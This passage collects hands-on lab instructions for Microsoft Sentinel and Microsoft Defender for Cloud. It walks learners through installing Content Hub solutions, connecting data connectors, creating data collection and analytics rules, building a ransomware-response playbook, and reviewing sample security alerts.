49 | >**Note:** The *Windows Security Events* solution installs both the *Windows Security Events via AMA* and the *Security Events via Legacy Agent* Data connectors. Plus 2 Workbooks, 20 Analytic Rules, and 43 Hunting Queries.
50 |
51 | 1. Select the *Windows Security Events via AMA* Data connector, and select **Open connector page** on the connector information blade.
52 |
53 | In the next task, we will setup this connector by creating data collection rule (DCR), and adding a Microsoft Azure Windows virtual machine to it.
54 |
55 | ### Task 3: Connect an Azure Windows virtual machine to Microsoft Sentinel
56 |
57 | 1. In the Search bar of the Azure portal, type Sentinel, then select Microsoft Sentinel.
58 |
59 | 1. Select your Microsoft Sentinel Workspace you created earlier.
60 |
61 | 1. In the Microsoft Sentinel left navigation menu, scroll down to Configuration and select Data Connectors.
62 |
63 | 1. Look for the Windows Security Events via AMA connector that you created in the previous exercise.
64 |
65 | 1. Select the Windows Security Events via AMA Data connector and select Open connector page on the connector information blade.
66 |
67 | 1. In the *Configuration* section, under the *Instructions* tab, select the **Create data collection rule**.
68 |
69 | 1. Enter **AZWINDCR** for Rule Name, then select **Next: Resources**.
70 |
71 | 1. Select **+Add resource(s)** to select the Virtual Machine we created.
72 |
73 | 1. Expand the *MOC Subscription-lodxxxxxxxx* subscription and the **RG2** resource group, then select **VM1**.
74 |
75 | 1. Select **Next: Collect**.
76 |
77 | 1. Review the different Security Event collection option. Keep *All Security Events* and then select **Next: Review + create**.
78 |
79 | 1. Select **Create** to save the Data Collection Rule.
80 |
81 | 1. It will take a few minutes to see the new data collection rule listed. You can select **Refresh** as needed. You can also select the *Bell* notification icon to see the progress of the rule creation. You should see that the rule creation "Successflly installed" the AMA agent extension on the VM1 virtual machine".
82 |
83 | ## Proceed to Exercise 4
84 |
--------------------------------------------------------------------------------
/Instructions/Demos/Ignite_2024_Lab_452-05.md:
--------------------------------------------------------------------------------
1 | ---
2 | lab:
3 | title: 'Exercise 05: Create a Playbook'
4 | module: 'Guided Project - Create detections and perform investigations using Microsoft Sentinel'
5 | ---
6 |
7 | ## Exercise overview
8 |
9 | You’re a Security Operations Architect working at a company that implemented Microsoft Sentinel. You must learn how to detect and mitigate threats using Microsoft Sentinel. Now, you want to respond and remediate actions that can be run from Microsoft Sentinel as a routine.
10 |
11 | With a playbook, you can help automate and orchestrate your threat response, integrate with other systems both internal and external, and can be set to run automatically in response to specific alerts or incidents, when triggered by an analytics rule or an automation rule, respectively. With automation rules, you can apply automation for minimal to large tasks across one or more incidents/alerts in order to efficiently and optimally respond to threats and tasks.
12 |
13 | ## Exercise instructions
14 |
15 | ### Task 1: Create a Playbook in Microsoft Sentinel
16 |
17 | In this task, you’ll create a Logic App that is used as a Playbook in Microsoft Sentinel.
18 |
19 | 1. In *Microsoft Sentinel*, navigate to **Content Hub**.
20 |
21 | 1. Within the search bar, look for **Sentinel SOAR Essentials**.
22 |
23 | 1. Select the solution that appears in the results.
24 |
25 | 1. Within the solution details, select **Install**.
26 |
27 | 1. Once installed, select Manage.
28 |
29 | 1. Find the **Defender_XDR_Ransomware_Playbook_for_SecOps_Tasks** playbook and select it.
30 |
31 | 1. Select the **Incident tasks - Microsoft Defender XDR Ransomware Playbook for SecOps** template.
32 |
33 | 1. On the details pane, select **Create playbook**.
34 |
35 | 1. For Resource Group, select **Create New**, enter **RG-Playbooks** and select OK.
36 |
37 | 1. Remove *for* from the name (limit of 64 exceeded).
38 |
39 | 1. Select **Connections**.
40 |
41 | 1. Select **Next: Review and create**.
42 |
43 | 1. Now select **Create Playbook**.
44 |
45 | >**Note:** Wait for the deployment to finish before proceeding to the next task.
46 |
47 | ### Task 2: Update a Playbook in Microsoft Sentinel
48 |
49 | In this task, you’ll update the new playbook you created with the proper connection information.
50 |
51 | 1. In the Search bar of the Azure portal, type Sentinel, then select Microsoft Sentinel.
52 |
53 | 1. Select your Microsoft Sentinel Workspace.
54 |
55 | 1. Select Automation under the Configuration area and then select the Active Playbooks tab.
56 |
57 | 1. Select Refresh from the command bar in case you don’t see any playbooks. You should see the playbook created from the previous step.
58 |
59 | 1. Select the **Defender_XDR_Ransomware_Playbook_SecOps_Tasks** playbook name.
60 |
61 | 1. On the Logic App page for **Defender_XDR_Ransomware_Playbook_SecOps_Tasks**, in the command menu, select Edit.
62 |
63 | >**Note:** You may need to refresh the page.
64 |
65 | 1. Select the first block, Microsoft Sentinel incident.
66 |
67 | 1. Select the Change connection link.
68 |
69 | 1. Select Add new and select Sign in. In the new window, select your Azure subscription admin credentials when prompted. The last line of the block should now read “Connected to your-admin-username”.
70 |
71 | 1. Below within the logic split, select Add task to incident.
72 |
73 | 1. Select Save on the command bar. The Logic App will be used in a future lab.
74 |
75 | ### Task 3: Create an Automation Rule
76 |
77 | 1. Within Microsoft Sentinel, go to Automation under Configuration.
78 |
79 | 1. Select Create and choose Automation Rule.
80 |
81 | 1. Give the rule a name
82 |
83 | 1. Leave the incident provider as All.
84 |
85 | 1. Leave the Analytic rule name as All.
86 |
87 | 1. Click Add and choose And.
88 |
89 | 1. From the drop down, select Tactics.
90 |
91 | 1. Select the following:
92 | - Reconnaissance
93 | - Execution
94 | - Persistence
95 | - Command and Control
96 | - Exfiltration
97 | - PreAttack
98 |
99 | 1. Under Actions, select Run Playbook.
100 |
101 | 1. Select Manage playbook permissions.
102 |
103 | 1. Find the resource group, select it, and select apply.
104 |
105 | 1. From the drop down list, select the **Defender_XDR_Ransomware_Playbook_SecOps_Tasks** playbook.
106 |
107 | 1. Select Apply at the bottom.
108 | From here, depending on your role, you will either continue doing more architect exercises or you will pivot to the analyst exercises.
109 |
110 | ## You have completed the lab
111 |
--------------------------------------------------------------------------------
/Instructions/Demos/Ignite_2024_Lab_452-02.md:
--------------------------------------------------------------------------------
1 | ---
2 | lab:
3 | title: 'Exercise 02: Connect data sources to Microsoft Sentinel'
4 | module: 'Guided Project - Connect data sources to a Microsoft Sentinel workspace'
5 | ---
6 |
7 | ## Exercise overview
8 |
9 | You are a Security Operations Architect working at a company that implemented Microsoft Sentinel. You must learn how to connect log data from the many data sources in your organization. The organization has data from Microsoft 365, Microsoft Defender, Azure resources, and non-azure virtual machines. As they are the easiest to do, you will start by connecting the Microsoft sources first.
10 |
11 | ## Exercise instructions
12 |
13 | ### Task 1 - Access the Microsoft Sentinel workspace
14 |
15 | In this task, you will access your Microsoft Sentinel workspace.
16 |
17 | 1. Log in to WIN1 virtual machine as Admin with the password: Pa55w.rd.
18 |
19 | 1. Open the Microsoft Edge browser.
20 |
21 | 1. In the Edge browser, navigate to the Azure portal at .
22 |
23 | 1. In the Sign in dialog box, copy, and paste in the Tenant Email account provided by your lab hosting provider and then select Next.
24 |
25 | 1. In the Enter password dialog box, copy, and paste in the Tenant Password provided by your lab hosting provider and then select Sign in.
26 |
27 | 1. In the Search bar of the Azure portal, type Sentinel, then select Microsoft Sentinel.
28 |
29 | 1. Select your Microsoft Sentinel Workspace that you created in the previous lab.
30 |
31 | 1. Proceed to the next task.
32 |
33 | ### Task 2 - Connect the Microsoft Defender for Cloud data connector
34 |
35 | In this task, you will connect the Microsoft Defender for Cloud data connector.
36 |
37 | 1. In the Microsoft Sentinel left navigation menu, scroll down to the Content management section and select Content Hub.
38 |
39 | 1. In the Content hub, search for the **Microsoft Defender for Cloud** solution and select it from the list.
40 |
41 | 1. On the Microsoft Defender for Cloud solution details page select Install.
42 |
43 | 1. When the installation completes, search for the Microsoft Defender for Cloud solution and select it.
44 |
45 | 1. On the Microsoft Defender for Cloud solution details page select Manage
46 |
47 | >**Note:** The Microsoft Defender for Cloud solution installs the Subscription-based Microsoft Defender for Cloud (Legacy) Data connector, the Tenant-based Microsoft Defender for Cloud (Preview) Data connector, and an Analytics rule. The Tenant-based Microsoft Defender for Cloud (Preview) Data connector is used when a tenant has multiple subscriptions.
48 |
49 | 1. Select the Subscription-based **Microsoft Defender for Cloud (Legacy)** Data connector check-box, and select Open connector page.
50 |
51 | 1. In the Configuration section, under the Instructions tab, select the checkbox for the hosted subscription and slide the Status option to the right.
52 |
53 | **Note:** If it switches back to disconnected, please review the prerequisites and confirm you have been assigned the proper permissions to modify the data connector.
54 |
55 | 1. The Status should be now Connected and “Bi-directional sync” should be Enabled.
56 |
57 | ### Task 3: Connect a Threat Intelligence Feed
58 |
59 | In this task, you will set up the Microsoft Defender Threat Intelligence Connector.
60 |
61 | 1. In the Microsoft Sentinel left navigation menu, scroll down to the Content management section and select Content Hub.
62 |
63 | 1. In the Content hub, search for the **Threat Intelligence** solution and select it from the list.
64 |
65 | 1. On the solution page, select Install.
66 |
67 | 1. When the installation completes, select Manage.
68 |
69 | 1. Select the **Microsoft Defender Threat Intelligence (Preview)** data connector and select Open connector page.
70 |
71 | 1. Under the configuration steps, click on the button to install.
72 |
73 | ### Task 4: Connect the Azure Activity data connector
74 |
75 | In this task, you will connect the *Azure Activity* data connector.
76 |
77 | 1. In the Microsoft Sentinel left menus, scroll down to the *Content management* section and select **Content Hub**.
78 |
79 | 1. In the *Content hub*, search for the **Azure Activity** solution and select it from the list.
80 |
81 | 1. On the *Azure Activity* solution page select **Install**.
82 |
83 | 1. When the installation completes select **Manage**
84 |
85 | >**Note:** The *Azure Activity* solution installs the *Azure Activity* Data connector, 12 Analytic rules, 14 Hunting queries and 1 Workbook.
86 |
87 | 1. Select the *Azure Activity* Data connector and select **Open connector page**.
88 |
89 | 1. In the *Configuration* area under the *Instructions* tab, scroll down to "2. Connect your subscriptions...", and select **Launch Azure Policy Assignment Wizard>**.
90 |
91 | 1. In the **Basics** tab, select the ellipsis button (...) under **Scope** and select your "MOC Subscription-lodxxxxxxxx" subscription from the drop-down list and click **Select**.
92 |
93 | 1. Select the **Parameters** tab, choose your *uniquenameDefender* workspace from the **Primary Log Analytics workspace** drop-down list. This action will apply the subscription configuration to send the information to the Log Analytics workspace.
94 |
95 | 1. Select the **Remediation** tab and select the **Create a remediation task** checkbox. This action will apply the policy to existing Azure resources.
96 |
97 | >**Note**: The remediation task creates a "managed identity" in the default "US East" region. You can change the region if you created the Log Analytics workspace in a different region.
98 |
99 | 1. Select the **Review + Create** button to review the configuration.
100 |
101 | 1. Select **Create** to finish.
102 |
103 | ## Proceed to Exercise 3
104 |
--------------------------------------------------------------------------------
/Instructions/Demos/Ignite_2024_Lab_452-04.md:
--------------------------------------------------------------------------------
1 | ---
2 | lab:
3 | title: 'Exercise 04: Create a Scheduled Query from a template'
4 | module: 'Guided Project - Create detections and perform investigations using Microsoft Sentinel'
5 | ---
6 |
7 | ## Exercise overview
8 |
9 | You're a Security Operations Analyst working at a company that implemented Microsoft Sentinel. You must learn how to detect and mitigate threats using Microsoft Sentinel. After connecting your data sources to Microsoft Sentinel, you create custom analytics rules to help discover threats and anomalous behaviors in your environment.
10 |
11 | Analytics rules search for specific events or sets of events across your environment, alert you when certain event thresholds or conditions are reached, generate incidents for your SOC to triage and investigate, and respond to threats with automated tracking and reMediation processes.
12 |
13 | ## Exercise instructions
14 |
15 | ### Task 1: Create a Scheduled Query
16 |
17 | In this task, you create a scheduled query and connect it to the Teams channel you created in the previous exercise.
18 |
19 | 1. Log in to WIN1 virtual machine as Admin with the password: **Pa55w.rd**.
20 |
21 | 1. In the **Sign in** dialog box, copy and paste in the **Tenant Email** account provided by your lab hosting provider and then select **Next**.
22 |
23 | 1. In the **Enter password** dialog box, copy and paste in the **Tenant Password** provided by your lab hosting provider and then select **Sign in**.
24 |
25 | 1. In the Search bar of the Azure portal, type *Sentinel*, then select **Microsoft Sentinel**.
26 |
27 | 1. Select your Microsoft Sentinel Workspace.
28 |
29 | 1. Select **Analytics** from the Configuration area.
30 |
31 | 1. Make sure that you are in the *Rule templates* tab in the command bar and search for the **New CloudShell User** rule.
32 |
33 | 1. Select the **New CloudShell User** rule template, and "right-click" to open and select the **+ Create rule** button to open the *Analytic rule wizard*.
34 |
35 | >**Note:** You can also select the *ellipsis icon* (...) on the *New CloudShell User* rule template to open the *+ Create rule* wizard.
36 |
37 | 1. From the rule summary blade, make sure you're receiving data by reviewing the green icon under *Data sources: Azure Activity*.
38 |
39 | >**Note:** If you do not see it in a connected state, make sure you completed Task 3 of the Learning Path 6 Lab, Exercise 1. --->
40 |
41 | 1. Select **Create rule** to continue.
42 |
43 | 1. In the Analytics rule wizard, on the *General* tab, change the *Severity* to **Medium**.
44 |
45 | 1. Select **Next: Set rule logic >** button:
46 |
47 | 1. For the rule query, select **View query results**. You shouldn't receive any results nor any errors.
48 |
49 | 1. Close the *Logs* window by selecting the upper right **X** and select **OK** to discard to save changes to go back to the wizard.
50 |
51 | 1. Scroll down and under *Query scheduling* set the following:
52 |
53 | |Setting|Value|
54 | |---|---|
55 | |Run Query every|5 minutes|
56 | |Lookup data from the last|1 Days|
57 |
58 | >**Note:** We are purposely generating many incidents for the same data. This enables the Lab to use these alerts.
59 |
60 | 1. Under the *Alert threshold* area, leave the value unchanged since we want the alert to register every event.
61 |
62 | 1. Under the *Event grouping* area, leave the **Group all events into a single alert** as the selected option since we want to generate a single alert every time it runs, as long as the query returns more results than the specified alert threshold above.
63 |
64 | 1. Select the **Next: Incident settings >** button.
65 |
66 | 1. On the *Incident settings* tab, review the default options.
67 |
68 | 1. Select the **Next: Automated response >** button.
69 |
70 |
71 | 1. Select the **Next: Review and create >** button.
72 |
73 | 1. Select **Save**.
74 |
75 | ### Task 2: Test your new rule
76 |
77 | In this task, you test your new scheduled query rule.
78 |
79 |
80 | 1. In the top bar of the Azure portal, Select the icon **>_** that corresponds to the Cloud Shell. You might need to select the ellipsis icon first **(...)** if your display resolution is too low.
81 |
82 | 1. In the *Welcome to Azure Cloud Shell* window, select **Powershell**.
83 |
84 | 1. On the *Getting started* page, select **Mount storage account**, and then select your **MOC subscription-lodxxxxxxxx** from the *storage account subscription* drop-down menu item and select the **Apply** button.
85 |
86 | >**Important:** Do not select the *No storage account required* radio button option. This wil cause the incident creation to fail.
87 |
88 | 1. On the *Mount storage account* page, select **We will create a storage account for you**, and then select **Next**.
89 |
90 | 1. Wait until the Cloud Shell is provisioned, then close the Azure Cloud Shell window.
91 |
92 | 1. In the Search bar of the Azure portal, type *Activity* and then select **Activity Log**.
93 |
94 | 1. Make sure the following *Operation name* items appear: **List Storage Account Keys** and **Update Storage Account Create**. These are the operations that the KQL query you reviewed earlier will match to generate the alert. **Hint:** You might need to select **Refresh** to update the list.
95 |
96 | 1. In the Search bar of the Azure portal, type *Sentinel*, then select **Microsoft Sentinel**.
97 |
98 | 1. Select your Microsoft Sentinel Workspace.
99 |
100 | 1. Select the **Incidents** menu option under *Threat management*.
101 |
102 | 1. Select the **Auto-refresh incidents** toggle.
103 |
104 | 1. You should see the newly created Incident.
105 |
106 | >**Note:** The event that triggers the incident may take 5+ minutes to process. Continue with the next exercise, you will come back to this view later.
107 |
108 | 1. Select the Incident and review the information in the right blade.
109 |
110 | ## Proceed to Exercise 5
111 |
--------------------------------------------------------------------------------
/Instructions/Demos/Ignite_2024_Lab_455-01.md:
--------------------------------------------------------------------------------
1 | ---
2 | lab:
3 | title: 'Exercise 1 - Enable Microsoft Defender for Cloud'
4 | module: 'Mitigate threats using Microsoft Defender for Cloud'
5 | ---
6 |
7 | # Exercise 1 - Enable Microsoft Defender for Cloud
8 |
9 | ## Lab scenario
10 |
11 | You're a Security Operations Analyst working at a company that is implementing cloud workload protection with Microsoft Defender for Cloud. In this lab, you enable Microsoft Defender for Cloud.
12 |
13 | ### Task 1: Create a Log Analytics Workspace
14 |
15 | In this task, you create a Log Analytics workspace for use with Azure Monitoring, Microsoft Sentinel and Microsoft Defender for Cloud.
16 |
17 | 1. In the Microsoft Edge browser, navigate to the Azure portal at .
18 |
19 | >**Note:** Select the **Resourses** tab for the *Username* and *Password* for the lab. Use the **** account for this lab.
20 |
21 | 1. In the **Sign in** dialog box, copy, and paste in the tenant Email account for the admin username provided by your lab hosting provider and then select **Next**.
22 |
23 | 1. In the **Enter password** dialog box, copy, and paste in the admin's tenant password provided by your lab hosting provider and then select **Sign in**.
24 |
25 | 1. In the Search bar of the Azure portal, type *Log Analytics workspaces*, then select the same service name.
26 |
27 | 1. Select **+Create** from the command bar.
28 |
29 | 1. Select **Create new** for the Resource group.
30 |
31 | 1. Enter *RG-Defender* and select **Ok**.
32 |
33 | 1. For the Name, enter **wrkspcIgnite**.
34 |
35 | 1. Select **Review + Create**.
36 |
37 | 1. Once the workspace validation has passed, select **Create**. Wait for the new workspace to be provisioned, this may take a few minutes.
38 |
39 | ### Task 2: Enable Microsoft Defender for Cloud
40 |
41 | In this task, you'll enable and configure Microsoft Defender for Cloud.
42 |
43 | 1. Log in to **SEA-DEV** virtual machine as Admin with the password: **Pa55w.rd**.
44 |
45 | 1. Open the Microsoft Edge browser or open a new tab if already open.
46 |
47 | 1. In the Search bar of the Microsoft Azure portal, type *Defender*, then select **Microsoft Defender for Cloud**.
48 |
49 | 1. In the left navigation menu for Microsoft Defender for Cloud, expand the Management section , and select **Environment settings**.
50 |
51 | 1. Select the **MOC Subscription-lodxxxxxxxx** subscription (or equivalent name in your Language).
52 |
53 | 1. Review the Azure resources that are now protected with the Defender for Cloud plans.
54 |
55 | >**Important:** If all Defender plans are *Off*, select **Enable all plans**. Select the *$200/month Microsoft Defender for APIs Plan 1* and then select **Save**. Select **Save** at the top of the page and wait for the *"Defender plans (for your) subscription were saved successfully!"* notifications to appear.
56 |
57 | 1. Select the **Settings & monitoring** tab from the Settings area (next to Save).
58 |
59 | 1. Review the monitoring extensions. It includes configurations for Virtual Machines, Containers, and Storage Accounts. Close the "Settings & monitoring" page by selecting the 'X' on the upper right of the page.
60 |
61 | 1. Close the settings page by selecting the 'X' on the upper right of the page to go back to the **Environment settings** and select the '>' to the left of your subscription.
62 |
63 | 1. Select the Log analytics workspace you created earlier *uniquenameDefender* to review the available options and pricing.
64 |
65 | 1. Select **Enable all plans** (to the right of Select Defender plan) and then select **Save**. Wait for the *"Microsoft Defender plan for workspace uniquenameDefender were saved successfully!"* notification to appear.
66 |
67 | >**Note:** If the page is not being displayed, refresh your Edge browser and try again.
68 |
69 | 1. Close the Defender plans page by selecting the 'X' on the upper right of the page to go back to the **Environment settings**
70 |
71 | ### Task 3: Understanding the Microsoft Defender for Cloud Dashboard
72 |
73 | 1. In the Search bar of the Microsoft Azure portal, type *Defender*, then select **Microsoft Defender for Cloud**.
74 |
75 | 1. In the left navigation menu for Microsoft Defender for Cloud, under the *General* section, select **Overview**.
76 |
77 | 1. The Overview blade provides a unified view into the security posture and includes multiple independent cloud security pillars such as Security posture, Regulatory compliance, Workload protections, Firewall Manager, Inventory, and Information Protection (preview). Each of these pillars also has its dedicated dashboard allowing deeper insights and actions around that vertical, providing easy access and better visibility for security professionals.
78 |
79 | >**Note:** The top menu bar allows you to view and filter subscriptions by selecting the Subscriptions button. In this lab, we will use only one but selecting different/additional subscriptions will adjust the interface to reflect the security posture of the selected subscriptions
80 |
81 | 1. Click on the **What’s new** icon link – a new tab opens with the latest release notes where you can stay current on the new features, bug fixes, and more.
82 |
83 | >**Note:** The high-level numbers at the top menu; This view allows you to see a summary of your subscriptions, active recommendations, and security alerts alongside connected cloud accounts.
84 |
85 | 1. From the top menu bar, select **Azure subscriptions**. This will bring you into the environment settings where you can select from the available subscriptions.
86 |
87 | 1. Return to the **Overview** page, and review the **Security posture** tile. You can see your current *Secure score* along with the number of completed controls and recommendations. Selecting this tile will redirect you to a drill-down view across subscriptions
88 |
89 | 1. On the **Regulatory compliance** tile, you can get insights into your compliance posture based on continuous assessment of both Azure and hybrid cloud environments. This tile shows the following standards which are Microsoft Cloud Security benchmark, and Lowest compliance regulatory standard. To view the data we first need to add Security policies.
90 |
91 | 1. Selecting this tile will redirect you to the **Regulatory compliance** dashboard – where you can add additional standards and explore the current ones
92 |
93 | 1. We will continue exploring *Microsoft Defender for Cloud* **Security posture** and **Regulatory compliance** in the next exercise.
94 |
95 | ## Proceed to Exercise 2
96 |
--------------------------------------------------------------------------------
/Instructions/Demos/Ignite_2024_Lab_455-02.md:
--------------------------------------------------------------------------------
1 | ---
2 | lab:
3 | title: 'Exercise 2 - Mitigate threats using Microsoft Defender for Cloud'
4 | module: 'Mitigate threats using Microsoft Defender for Cloud'
5 | ---
6 |
7 | # Exercise 2 - Understanding Microsoft Defender for Cloud Dashboard
8 |
9 | ## Lab scenario
10 |
11 | You're a Security Operations Analyst working at a company that implemented Microsoft Defender for Cloud. You need to respond to recommendations and security alerts generated by Microsoft Defender for Cloud.
12 |
13 | ### Task 1: Explore Regulatory Compliance
14 |
15 | In this task, you'll review Regulatory compliance configuration in Microsoft Defender for Cloud.
16 |
17 | 1. Log in to **SEA-DEV** virtual machine as Admin with the password: **Pa55w.rd**.
18 |
19 | 1. In the Microsoft Edge browser, open the Azure portal at .
20 |
21 | 1. In the **Sign in** dialog box, copy, and paste in the **Tenant Email** account provided by your lab hosting provider and then select **Next**.
22 |
23 | 1. In the **Enter password** dialog box, copy, and paste in the **Tenant Password** provided by your lab hosting provider and then select **Sign in**.
24 |
25 | 1. In the Search bar of the Microsoft Azure portal, type *Defender*, then select **Microsoft Defender for Cloud**.
26 |
27 | 1. Under *Cloud Security*, select **Regulatory compliance** from the left menu items.
28 |
29 | >Lab Tip - If you are seeing the Regulatory Compliance page with data, please **Refresh** your browser.
30 |
31 | 1. Select **Manage compliance standards** on the toolbar.
32 |
33 | 1. Select your subscription.
34 |
35 | >**Hint:** Select **Expand all** to find your subscription if you have a hierarchy of Management Groups.
36 |
37 | 1. Under *Settings*, select **Security policies** in the portal menu.
38 |
39 | 1. Scroll down and review the "Security standards" available to you by default.
40 |
41 | 1. Use the search box to find *ISO 27001:2013*.
42 |
43 | 1. Select and move the **Status** slider to right of *ISO 27001:2013* to **On**.
44 |
45 | >**Note:** Some standards require you to assign an Azure Policy initiative.
46 |
47 | 1. Select **Refresh** on the page menu to confirm that *ISO 27001:2013* is set to *On* for your subscription.
48 |
49 | 1. Next on the **Security policies** page, In the search bar, search for **SOC 2 Type 2**. Select the toggle button to change the status to On
50 |
51 | 1. On the **Set parameters** blade, enter the following details and select **Save**.
52 |
53 | - Allowed registry or registries regex: []
54 | - Max allowed CPU units: 200m
55 | - Max allowed memory bytes: 1
56 |
57 | 1. Close the *Security policies* page by selecting the 'X' on the upper right of the page to go back to the **Environment settings**.
58 |
59 | 1. Navigate back to *Regulatory compliance*. To view the recently added standards select **Show all**
60 |
61 | >**Note:** It can take up to two hours for newly added standards to appear under the Lowest compliance regulatory standard. Please move on to the next step; you can review the standards later.
62 |
63 |
64 | ### Task 2: Explore Workload protection
65 |
66 | In this task, you'll review Workload protections.
67 |
68 | 1. In the left navigation menu, expand *Cloud Security* section, and select **Workload protections**.
69 |
70 | 1. In the Workload Protections, you can see the coverage of your connected resources for the currently selected subscription. Your current resource coverage should be fully covered 100% which means full protection. Additionally, you can also view the recent security alerts, color-coded by severity.
71 |
72 | 1. Next Click on Inventory from the General section of the Microsoft Defender for Cloud. It shows the number of unmonitored VMs alongside the total covered resources - you should expect to have zero unmonitored VMs. Resources are classified according to their health status.
73 |
74 |
101 |
102 | ### Task 3: Mitigate security alerts
103 |
104 | In this task, you'll load sample security alerts and review the alert details.
105 |
106 | 1. Under *General*, select **Security alerts** in the portal menu.
107 |
108 | 1. Select **Sample alerts** from the command bar. **Hint:** you may need to select the ellipsis (...) button from the command bar.
109 |
110 | 1. In the Create sample alerts (Preview) pane make sure your subscription is selected and that all sample alerts are selected in the *Defender for Cloud plans* area.
111 |
112 | 1. Select **Create sample alerts**.
113 |
114 | >**Note:** This sample alert creation process may take a few minutes to complete, wait for the *"Successfully created sample alerts"* notification.
115 |
116 | 1. Once completed, select **Refresh** (if needed) to see the alerts appear under the *Security alerts* area.
117 |
118 | 1. Choose an interesting alert with a *Severity* of *High* and perform the following actions:
119 |
120 | - Select the alert checkbox and the alert detail pane should appear. Select **View full details**.
121 |
122 | - Review and read the *Alert details* tab.
123 |
124 | - Select the **Take action** tab or scroll down and select the **Next: Take Action** button at the end of the page.
125 |
126 | - Review the *Take action* information. Notice the sections available to take action depending on the type of alert: Inspect resource context, Mitigate the threat, Prevent future attacks, Trigger automated response and Suppress similar alerts.
127 |
128 | ## You have completed the lab
129 |
--------------------------------------------------------------------------------
/Instructions/Labs/LAB_02_deploy_microsoft_sentinel_content_hub_solution.md:
--------------------------------------------------------------------------------
1 | ---
2 | lab:
3 | title: 'Exercise 02: Ingest Windows Security event data'
4 | module: 'Guided Project - Deploy Microsoft Sentinel Content Hub solutions and data connectors'
5 | ---
6 |
7 | >**Note**: This lab builds on Lab 01. To complete this lab, you will need an [Azure subscription.](https://azure.microsoft.com/free/?azure-portal=true) in which you have administrative access.
8 |
9 | ## General guidelines
10 |
11 | - When creating objects, use the default settings unless there are requirements that require different configurations.
12 | - Only create, delete, or modify objects to achieve the stated requirements. Unnecessary changes to the environment may adversely affect your final score.
13 | - If there are multiple approaches to achieving a goal, always choose the approach the requires the least amount of administrative effort.
14 |
15 | We need configure Microsoft Sentinel to ingest data by using Microsoft Sentinel solutions.
16 |
17 | ## Architecture diagram
18 |
19 | 
20 |
21 | ## Skilling tasks
22 |
23 | You need to deploy Content Hub solutions in the Microsoft Sentinel workspace and meet the following requirements:
24 |
25 | - Install the following solutions:
26 | - Windows Security Events.
27 | - Azure Activity connector.
28 | - Microsoft Defender for Cloud.
29 | - Configure the data connector for Azure Activity to apply all new and existing resources in the subscription.
30 | - Configure the data connector for Microsoft Defender for Cloud to connect to the Azure subscription and ensure that only bi-directional sync is enabled.
31 | - Enable an analytics rule based on the Suspicious number of resource creation or deployment activities template. The rule should run every hour and only lookup data for that last hour.
32 | - Ensure that the Azure Activity workbook is available in My workbooks.
33 |
34 | ## Exercise instructions
35 |
36 | >**Note**: In the following tasks, to access `Microsoft Sentinel`, select the `workspace` you created in Lab 01.
37 |
38 | ### Task 1 - Deploy a Microsoft Sentinel Content Hub solution
39 |
40 | Deploy a Content Hub solution and configure Data connectors. Learn more about [Content Hub solutions](https://learn.microsoft.com/azure/sentinel/sentinel-solutions).
41 |
42 | 1. In `Microsoft Sentinel`, go to the `Content management` menu section and select **Content Hub**
43 | 1. Search for and select **Windows Security Events**
44 | 1. Select the link for **View details**
45 | 1. Select Windows Security Events plan, and select **Create**
46 | 1. Select the `RG2` resource group that includes the Microsoft Sentinel workspace, and select the `Workspace`.
47 | 1. Select **Next** to the Data Connectors tab (solution will deploy 2 data connectors)
48 | 1. Select **Next** to the Workbooks tab (solution installs workbooks)
49 | 1. Select **Next** to the Analytics tab (solutions installs analytics rules)
50 | 1. Select **Next** to the Hunting queries tab (solution instals hunting queries)
51 | 1. Select **Review + create**
52 | 1. Select **Create**
53 |
54 | 1. Repeat these steps for the `Azure Activity` and the `Microsoft Defender for Cloud` solutions.
55 |
56 | ### Task 2 - Set up the data connector for Azure Activity
57 |
58 | Configure the data connector for Azure Activity to apply all new and existing resources in the subscription. Learn more about [Microsoft Sentinel data connectors](https://learn.microsoft.com/azure/sentinel/connect-data-sources).
59 |
60 | 1. In `Microsoft Sentinel`, go to the `Content management` menu section and select **Content Hub**.
61 | 1. In the `Content hub`, filter `Status` for Installed solutions.
62 | 1. Select the `Azure Activity` solution and select **Manage**.
63 | 1. Select the `Azure Activity` Data connector and select **Open connector page**.
64 | 1. In the `Configuration` area under the `Instructions` tab, scroll down to `2. Connect your subscriptions...`, and select **Launch Azure Policy Assignment Wizard>**.
65 | 1. In the **Basics** tab, select the ellipsis button (...) under **Scope** and select your subscription from the drop-down list and click **Select**.
66 | 1. Select the **Parameters** tab, choose your workspace from the **Primary Log Analytics workspace** drop-down list.
67 | 1. Select the **Remediation** tab and select the **Create a remediation task** checkbox.
68 | 1. Select the **Review + Create** button to review the configuration.
69 | 1. Select **Create** to finish.
70 |
71 | ### Task 3 - Set up the for Defender for Cloud data connector
72 |
73 | Configure the data connector for Microsoft Defender for Cloud and ensure that that only incident management is configured.
74 |
75 | 1. In `Microsoft Sentinel`, go to the `Content management` menu section and select **Content Hub**.
76 | 1. In the `Content hub`, filter `Status` for Installed solutions.
77 | 1. Select the `Microsoft Defender for Cloud` solution and select **Manage**.
78 | 1. Select the `Subscription-based Microsoft Defender for Cloud (Legacy)` Data connector and select **Open connector page**
79 | 1. In the `Configuration` area under the `Instructions` tab, scroll down to your subscription and move the slider in the `Status` column to **Connected**.
80 | 1. Make sure `Bi-directional sync` is **Enabled**.
81 |
82 | ### Task 4 - Create an analytics rule
83 |
84 | Create an analytic rule based on the Suspicious number of resource creation or deployment activities template. The rule should run every hour and only lookup data for that last hour. Learn more about [Using Microsoft Sentinel Analytic rule templates](https://learn.microsoft.com/azure/sentinel/detect-threats-built-in).
85 |
86 | 1. In `Microsoft Sentinel`, go to the `Configuration` menu section and select **Analytics**.
87 | 1. In the `Rule templates` tab, search for **Suspicious number of resource creation or deployment activities**.
88 | 1. Select the **Suspicious number of resource creation or deployment activities**, and select **Create rule**.
89 | 1. Leave the defaults on the `General` tab and select **Next: Set rule logic >**.
90 | 1. Leave the default `Rule query` and configure `Query scheduling` using the table:
91 |
92 | |Setting |Value|
93 | |---|---|
94 | |Run query every|1 Hours|
95 | |Lookup data from the last|1 Hours|
96 |
97 | 1. Select **Next: Incident settings >**.
98 | 1. Leave the defaults and select **Next: Automated response >**.
99 | 1. Leave the defaults and select **Next: Review and create >**.
100 | 1. Select **Save**.
101 |
102 | ### Task 5 - Ensure that the Azure Activity workbook is available in My workbooks
103 |
104 | 1. In `Microsoft Sentinel`, go to the `Content management` menu section and select **Content Hub**.
105 | 1. In the `Content hub`, filter `Status` for Installed solutions.
106 | 1. Select the `Azure Activity` solution and select **Manage**.
107 | 1. Select the `Azure Activity` workbook `checkbox`, and then select **Configuration**.
108 | 1. Select the `Azure Activity` workbook and select **Save**.
